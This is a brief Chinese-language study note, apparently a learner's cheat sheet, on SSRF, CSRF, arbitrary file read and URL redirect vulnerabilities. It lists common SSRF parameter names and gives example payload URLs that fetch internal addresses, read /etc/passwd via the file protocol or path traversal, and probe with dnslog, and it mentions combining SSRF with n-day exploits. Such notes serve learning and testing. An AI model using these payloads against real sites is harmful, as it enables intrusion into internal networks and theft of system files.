如果你在本地用file打开网页可能有误差,因为file协议打开页面发送的http头有的网站是验证origin字段来防御csrf
ssrf:服务端请求伪造(相当一个跳板机,访问内网)
作用:1.可以配合一个类似于永恒之蓝这种nday使用;
♾️ text 代码: 2.可以配合利用file协议等去读取一个文件内容:file:///etc/passwd;
3.url=dnslog.com 看看能不能爆出一个ip地址,或者放上oa系统等
常见的ssrf常数:
♾️ php 代码:share
wap
url
link
src
source
taiget
u
3g
display
sourceURL
domain
querylmageurl
slconurl
qrcodeurl
你在家里:
oa.a.com 打不开
www.a.com 打开 www.a.com?url=oa.a.com 回显oa页面
http://www.a.com?url=http://192.168.1.1
http://www.a.com?url=file:///etc/passwd
csrf: 跨站请求伪造(外网)
任意文件(读取/下载)
http://www.a.com?url=../../../../etc/passwd #上面不带一个协议
url跳转:(区别在于地址是否发生一个变化)
http://www.a.com?url=http://wwww.b.com-->地址栏显示www.b.com